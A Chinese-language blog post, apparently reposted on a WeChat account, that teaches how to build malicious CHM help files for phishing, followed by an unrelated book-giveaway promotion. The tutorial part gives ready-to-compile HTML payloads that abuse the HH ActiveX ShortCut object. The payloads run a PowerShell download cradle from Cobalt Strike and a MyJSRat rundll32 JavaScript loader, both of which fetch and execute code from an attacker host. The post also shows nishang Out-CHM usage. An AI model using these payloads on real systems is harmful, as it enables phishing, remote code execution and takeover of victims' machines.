前言
chm是Compiled HTML Help file的縮寫,意為已編譯的HTML幫助文件,當攻擊者將惡意代碼寫入chm中,當用戶點擊就會執行預設的惡意命令。
chm命令執行示例
下載安裝html help workshop
使用html help workshop創建新項目,選擇一個.hhp文件為目標
創建並添加惡意html文件(執行calc),內容如下
<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>command exec <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1><PARAM name="Command" value="ShortCut"> <PARAM name="Button" value="Bitmap::shortcut"> <PARAM name="Item1" value=',calc.exe'> <PARAM name="Item2" value="273,1,1"></OBJECT><SCRIPT>x.Click();</SCRIPT></body></html>
選擇file-compile編譯得到chm文件
運行chm文件,成功打開計算器
使用cs木馬配合CHM getshell
攻擊-釣魚攻擊-Scripted Web Delivery
生成powershell的payload
複製內容
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xx.xx.xx.xx:90/a'))"將其填充到html中替換calc,powershell.exe之後要多添加一個逗號,並將引號衝突重新解決一下
<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>command exec <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1><PARAM name="Command" value="ShortCut"> <PARAM name="Button" value="Bitmap::shortcut"> <PARAM name="Item1" value=',powershell.exe, -nop -w hidden -c IEX ((new-object net.webclient).downloadstring("http://xx.xx.xx.xx:90/a"))'> <PARAM name="Item2" value="273,1,1"></OBJECT><SCRIPT>x.Click();</SCRIPT></body></html>編譯生成chm,運行上線
使用nishang Out-Chm.ps1製作惡意chm文檔
使用msf或cs開啟powershell的web_delivery
Import-Module .\Out-CHM.ps1Out-CHM -PayloadURL http://xx.xx.xx.xx:90/ -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
通過CHM+JSRAT Getshell
https://github.com/Ridter/MyJSRat
123git clone https://github.com/Ridter/MyJSRatcd MyJSRatpython MyJSRat.py -i xx.xx.xx.xx -p 8888
訪問其開啟web的 /wtf路徑,可得到payload
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://xx.xx.xx.xx:8888/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}使用該payload替換Item1中的value,在rundll32.exe之後加上逗號,處理好單雙引號衝突
<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>command exec <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1><PARAM name="Command" value="ShortCut"> <PARAM name="Button" value="Bitmap::shortcut"> <PARAM name="Item1" value=',rundll32.exe, javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://xx.xx.xx.xx:8888/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}'> <PARAM name="Item2" value="273,1,1"></OBJECT><SCRIPT>x.Click();</SCRIPT></body></html>使用上文提到的方式生成chm文件,雙擊打開上線
作者:Leticia,文章轉載於http://uuzdaisuki.com/
贈書福利
一:Python數據分析與可視化從入門到精通
(1)沒有高深理論,每章都以實例為主,讀者參考書中源碼運行,就能得到與書中一樣的結果。(2)專注於Python數據分析與可視化操作中實際用到的技術。相比大而全的書籍資料,本書能讓讀者儘快上手,開始項目開發。(3)書中的「新手問答」和「小試牛刀」欄目能讓讀者鞏固知識,舉一反三,學以致用。
二:機器學習數學基礎(Python語言實現)
本書是一本系統介紹機器學習所涉及的數學知識和相關Python編程的實例工具書,同時還介紹了很好經典的綜合案例,除了編寫機器學習的代碼,還編寫了深度學習的代碼。本書一共分為兩部分。
部分為數學基礎知識部分,包含 8個章節,介紹了微積分、線性代數、概率統計、信息論、模糊數學、隨機過程、凸優化和圖論的系統知識體系及幾個數學知識點對應的Python編程實例。通過這些實例,讀者能夠了解Scikit-learn、Scikit-fuzzy、Theano、SymPy、NetworkX和CVXPY中相應的庫函數的應用。
第二部分為案例部分,包含4個章節,介紹了微積分、線性代數和概率統計問題的建模方法、求解流程和編程實現,以及工業生產領域的Python實戰,包含了機器學習算法和深度學習PyTorch框架的應用。
三:人工智能算法基礎
本書以零基礎講解為宗旨,詳細講解了常用的人工智能算法,並與實際應用相結合,內容循序漸進,案例豐富翔實,旨在幫助讀者掌握人工智能的算法基礎。全書分為4篇,共20章。其中第1篇為基礎算法篇,從第1章到第9章,主要講述排序、查找、線性結構、樹、散列、圖、堆棧等基本數據結構算法;第2篇為機器學習算法篇,從第10章到第14章,主要講述分類算法、回歸算法、聚類算法、降維算法和集成學習算法;第3篇為強化學習算法篇,從第15章到第16章,主要講述基於價值的強化學習算法和基於策略的強化學習算法;第4篇為深度學習算法篇,從第17章到第19章,主要講述神經網絡模型算法、循環神經網絡算法和卷積神經網絡算法等內容。本書適合準備從事數據科學與人工智能相關行業的讀者。 為了感謝大家一直以來的關注與支持,會有三本書籍免費贈送
。
規則如下:
1. 本文末點『在看』,不需要轉發朋友圈,點個『在看』就可以。
2.私聊文末公眾號發送「抽獎」即可掃描參與抽獎,注意看是發送暗號「抽獎」。
3. 中獎者不滿足條件1,視為放棄中獎資格。
4. 活動截止時間6月10日 16:00點,到時候還要中獎者及時聯繫號主發送你的中獎核驗二維碼、收貨地址、姓名、手機號以及想要的書籍,好給您發送書籍哦!24小時內未聯繫號主視為自動放棄!騙書行為出版社會永久拉黑!
先點「再看」,然後點擊下方公眾號私聊發送「抽獎」即可馬上掃描參與抽獎
留言列表